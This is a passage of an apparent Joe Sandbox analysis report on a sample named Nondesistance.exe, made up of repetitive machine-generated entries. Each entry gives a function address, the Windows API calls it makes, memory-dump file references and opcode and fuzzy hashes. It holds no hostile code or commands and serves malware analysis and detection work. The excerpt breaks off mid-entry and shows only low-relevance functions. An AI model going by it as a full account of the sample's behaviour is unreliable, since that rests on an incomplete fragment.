                                                                                                  • Opcode ID: 624745e1c2f25a16b10ea7285cceccfece8d7894aeb9d878da06ff78070054d8
                                                                                                  • Instruction ID: c697d808c4e59c81b2ccde1a948b82941deecacae3b345ad39c5db03ab9efa89
                                                                                                  • Opcode Fuzzy Hash: 624745e1c2f25a16b10ea7285cceccfece8d7894aeb9d878da06ff78070054d8
                                                                                                  • Instruction Fuzzy Hash: 48F08231B05240DBDB20DF659D45A9B7FA8EFA1355B10443BF145F6191D2388542DB29
                                                                                                  Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ShowWindow.USER32(00000000), ref: 00401579
                                                                                                  • ShowWindow.USER32(000103EA), ref: 0040158E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ShowWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 1268545403-0
                                                                                                  • Opcode ID: 748cd7fe1685eb5367add993e96662fd24b39d6897b161640e6c14adf6400025
                                                                                                  • Instruction ID: b54bb08643918bb8896a5862ce8d2e5c56cc7996104e834ef2f2724ba304e424
                                                                                                  • Opcode Fuzzy Hash: 748cd7fe1685eb5367add993e96662fd24b39d6897b161640e6c14adf6400025
                                                                                                  • Instruction Fuzzy Hash: A5E0E57BB182405FEB21DB64AD9086D7BA29B95310795017BD101A7591C2789C09C728
                                                                                                  Function 004060C8 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                    • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                                    • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                                                                    • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 2547128583-0
                                                                                                  • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                  • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                                                                  • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                  • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                                                                  Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Nondesistance.exe,80000000,00000003), ref: 004059A6
                                                                                                  • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesCreate
                                                                                                  • String ID:
                                                                                                  • API String ID: 415043291-0
                                                                                                  • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                  • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                                                  • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                  • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                                                  Function 0040597D Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
                                                                                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                                  • Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
                                                                                                  • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                                  • Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6
                                                                                                  Function 0040548B Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                                                                  • GetLastError.KERNEL32 ref: 0040549F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1375471231-0
                                                                                                  • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                  • Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
                                                                                                  • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                  • Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E
                                                                                                  Function 100027E8 Relevance: 2.7, APIs: 2, Instructions: 156memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNELBASE(00000000), ref: 100028A7
                                                                                                  • GetLastError.KERNEL32 ref: 100029AE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20224243573.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20224205010.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20224274318.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20224300969.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_10000000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocErrorLastVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 497505419-0
                                                                                                  • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                  • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                                                  • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                  • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                                                  Function 00402283 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfileStringWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 390214022-0
                                                                                                  • Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                                                                  • Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
                                                                                                  • Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                                                                  • Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9
                                                                                                  Function 00401717 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PathSearch
                                                                                                  • String ID:
                                                                                                  • API String ID: 2203818243-0
                                                                                                  • Opcode ID: 342f1d8797400d1def45ae1f8570d4d2e76e844b62760f1e711b9a1a45a0c132
                                                                                                  • Instruction ID: c7ce876e5ad96af4d980a0e505f4bdb0f2e6b31a9f033159e1f135e3aabe3218
                                                                                                  • Opcode Fuzzy Hash: 342f1d8797400d1def45ae1f8570d4d2e76e844b62760f1e711b9a1a45a0c132
                                                                                                  • Instruction Fuzzy Hash: 3DE0D872204100ABE300DB549D48FAA3758DB10368F304537F201A60C1D2B499459639
                                                                                                  Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExA.KERNELBASE(00000000,000000C1,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Open
                                                                                                  • String ID:
                                                                                                  • API String ID: 71445658-0
                                                                                                  • Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                                  • Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
                                                                                                  • Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                                  • Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69
                                                                                                  Function 00405A49 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3934441357-0
                                                                                                  • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                  • Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
                                                                                                  • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                  • Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9
                                                                                                  Function 00405A1A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2738559852-0
                                                                                                  • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                  • Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
                                                                                                  • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                  • Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9
                                                                                                  Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20224243573.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20224205010.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20224274318.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20224300969.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_10000000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                  • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                                                  • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                  • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                                                                  Function 004022C7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022FA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfileString
                                                                                                  • String ID:
                                                                                                  • API String ID: 1096422788-0
                                                                                                  • Opcode ID: e1bf17ceeca7babf037772fd815ac17da169c1b5a8a1c598223fa677f22f5cbc
